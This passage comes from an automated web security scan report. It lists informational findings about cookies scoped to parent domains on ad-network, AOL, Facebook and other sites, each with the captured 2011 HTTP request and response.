Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=13198:5934/14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sun, 5-May-2013 5:07:38 GMT; path=/; domain=.mediaplex.com;
Location: http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D596776865&mpt=596776865&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596776865;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link=
Content-Length: 0
Date: Thu, 05 May 2011 11:59:38 GMT

16.24. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/13198-126290-5934-6

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

mojo3=13198:5934/14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:13:50 GMT; path=/; domain=.mediaplex.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/13198-126290-5934-6?mpt=1304575127810&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=13198:5934/14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:13:50 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 389
Date: Thu, 05 May 2011 00:59:54 GMT

document.write('<a target="_blank" href="http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5e
...[SNIP]...

16.25. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/14302-119028-16279-0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:59:06 GMT; path=/; domain=.mediaplex.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/14302-119028-16279-0?mpt=557124584&mpvc=http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:59:06 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 602
Date: Thu, 05 May 2011 00:59:50 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:6
...[SNIP]...

16.26. http://altfarm.mediaplex.com/ad/tr/10105-123060-1629-13 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/tr/10105-123060-1629-13

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 5:30:24 GMT; path=/; domain=.mediaplex.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/tr/10105-123060-1629-13?mpt=556984181 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:2060/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

16.27. http://altfarm.mediaplex.com/ad/tr/10105-123060-1629-14 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/tr/10105-123060-1629-14

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

mojo3=10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sun, 5-May-2013 5:33:42 GMT; path=/; domain=.mediaplex.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/tr/10105-123060-1629-14?mpt=596776863 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=13198:5934/14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

16.28. http://aol.worldwinner.com/cgi/welcome/21sie previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://aol.worldwinner.com
Path:	/cgi/welcome/21sie

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

www.worldwinner.comSID_=9c1aba1127003fc2c6befcde684d7cb1; path=/; domain=.worldwinner.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi/welcome/21sie HTTP/1.1
Host: aol.worldwinner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:52:18 GMT
Server: Apache
Location: http://aol.worldwinner.com/cgi/nosession/aol_sns_handler.pl
Content-Length: 243
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: www.worldwinner.comSID_=9c1aba1127003fc2c6befcde684d7cb1; path=/; domain=.worldwinner.com
P3P: CP="NOI DSP COR NID TAIi OUR NOR CNT"
Cache-Control: private
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://aol.worldwinner.com/cgi/nosession/aol_sn
...[SNIP]...

16.29. http://aolmobile.aol.com/registration/changeSettings previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://aolmobile.aol.com
Path:	/registration/changeSettings

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

RSP_LOCAL_AOLMOBILE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=.aol.com
RSP_PORTAL_AOLPORTAL=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/_cqr; domain=.aol.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /registration/changeSettings HTTP/1.1
Host: aolmobile.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=31CD361837F0D202F18D7692A6450835.worker1; s_pers=%20s_getnr%3D1304575085859-Repeat%7C1367647085859%3B%20s_nrgvo%3DRepeat%7C1367647085861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:52:19 GMT
Server: Apache
Set-Cookie: RSP_LOCAL_AOLMOBILE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=.aol.com
Set-Cookie: RSP_PORTAL_AOLPORTAL=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/_cqr; domain=.aol.com
Location: https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=aolmobile.aol.com&authLev=1&lang=en&locale=us&siteState=OrigUrl%3Dhttp%253A%252F%252Faolmobile.aol.com%252Fregistration%252FchangeSettings
Content-Length: 400
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://my.screenname.aol.com/_cqr/login/login.
...[SNIP]...

16.30. http://aolmobile.aol.com/registration/deleteDevice previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://aolmobile.aol.com
Path:	/registration/deleteDevice

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

RSP_LOCAL_AOLMOBILE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=.aol.com
RSP_PORTAL_AOLPORTAL=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/_cqr; domain=.aol.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /registration/deleteDevice HTTP/1.1
Host: aolmobile.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=31CD361837F0D202F18D7692A6450835.worker1; s_pers=%20s_getnr%3D1304575085859-Repeat%7C1367647085859%3B%20s_nrgvo%3DRepeat%7C1367647085861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:52:19 GMT
Server: Apache
Set-Cookie: RSP_LOCAL_AOLMOBILE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=.aol.com
Set-Cookie: RSP_PORTAL_AOLPORTAL=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/_cqr; domain=.aol.com
Location: https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=aolmobile.aol.com&authLev=1&lang=en&locale=us&siteState=OrigUrl%3Dhttp%253A%252F%252Faolmobile.aol.com%252Fregistration%252FdeleteDevice
Content-Length: 398
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://my.screenname.aol.com/_cqr/login/login.
...[SNIP]...

16.31. http://aolmobile.aol.com/registration/generateConfCode previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://aolmobile.aol.com
Path:	/registration/generateConfCode

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

RSP_LOCAL_AOLMOBILE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=.aol.com
RSP_PORTAL_AOLPORTAL=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/_cqr; domain=.aol.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /registration/generateConfCode HTTP/1.1
Host: aolmobile.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=31CD361837F0D202F18D7692A6450835.worker1; s_pers=%20s_getnr%3D1304575085859-Repeat%7C1367647085859%3B%20s_nrgvo%3DRepeat%7C1367647085861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:52:19 GMT
Server: Apache
Set-Cookie: RSP_LOCAL_AOLMOBILE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=.aol.com
Set-Cookie: RSP_PORTAL_AOLPORTAL=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/_cqr; domain=.aol.com
Location: https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=aolmobile.aol.com&authLev=1&lang=en&locale=us&siteState=OrigUrl%3Dhttp%253A%252F%252Faolmobile.aol.com%252Fregistration%252FgenerateConfCode
Content-Length: 402
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://my.screenname.aol.com/_cqr/login/login.
...[SNIP]...

16.32. http://aolmobile.aol.com/registration/validateConfirmCode previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://aolmobile.aol.com
Path:	/registration/validateConfirmCode

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

RSP_LOCAL_AOLMOBILE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=.aol.com
RSP_PORTAL_AOLPORTAL=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/_cqr; domain=.aol.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /registration/validateConfirmCode HTTP/1.1
Host: aolmobile.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=31CD361837F0D202F18D7692A6450835.worker1; s_pers=%20s_getnr%3D1304575085859-Repeat%7C1367647085859%3B%20s_nrgvo%3DRepeat%7C1367647085861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:52:19 GMT
Server: Apache
Set-Cookie: RSP_LOCAL_AOLMOBILE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=.aol.com
Set-Cookie: RSP_PORTAL_AOLPORTAL=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/_cqr; domain=.aol.com
Location: https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=aolmobile.aol.com&authLev=1&lang=en&locale=us&siteState=OrigUrl%3Dhttp%253A%252F%252Faolmobile.aol.com%252Fregistration%252FvalidateConfirmCode
Content-Length: 405
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://my.screenname.aol.com/_cqr/login/login.
...[SNIP]...

16.33. http://apartments.rentedspaces.oodle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apartments.rentedspaces.oodle.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

otu=9d24efce43dd8cc7953ce4e26ae5ee49; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
ots=10638657d5601f6477e0bfda5c9e7dba; path=/; domain=.oodle.com
a=dT1BOEQzNzU3RjREQzI4MTZG; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
multivariate=YToyOntzOjEyOiJyZW50ZWRzcGFjZXMiO3M6MTI6InJlbnRlZHNwYWNlcyI7czoxMDoiX3RpbWVzdGFtcCI7aToxMzA0NTkyNzUxO30%3D; path=/; domain=.oodle.com
loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: apartments.rentedspaces.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
X-ODL-Server: dHJvaQ==
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Thu, 05 May 2011 10:52:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: otu=9d24efce43dd8cc7953ce4e26ae5ee49; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=10638657d5601f6477e0bfda5c9e7dba; path=/; domain=.oodle.com
Set-Cookie: a=dT1BOEQzNzU3RjREQzI4MTZG; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: multivariate=YToyOntzOjEyOiJyZW50ZWRzcGFjZXMiO3M6MTI6InJlbnRlZHNwYWNlcyI7czoxMDoiX3RpbWVzdGFtcCI7aToxMzA0NTkyNzUxO30%3D; path=/; domain=.oodle.com
Set-Cookie: loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Content-Length: 182628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...

16.34. http://ar-ar.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar-ar.facebook.com
Path:	/login.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

datr=yZ_CTXCcbtu4v4v8l1dHFsQR; expires=Sat, 04-May-2013 13:02:01 GMT; path=/; domain=.facebook.com; httponly
lsd=aCE9U; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Far-ar.facebook.com%2Flogin.php; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Far-ar.facebook.com%2Flogin.php; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php HTTP/1.1
Host: ar-ar.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=yZ_CTXCcbtu4v4v8l1dHFsQR; expires=Sat, 04-May-2013 13:02:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=aCE9U; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Far-ar.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Far-ar.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.103.114
X-Cnection: close
Date: Thu, 05 May 2011 13:02:01 GMT
Content-Length: 17388
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ar" lang="ar" id="facebook" class=
...[SNIP]...

16.35. http://ar.voicefive.com/b/wc_beacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304557020%2E283%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1304557020.283,wait-%3E10000,&1304575020884 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; BMX_G=method->-1,ts->1304557018; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:57:02 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304557020%2E283%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
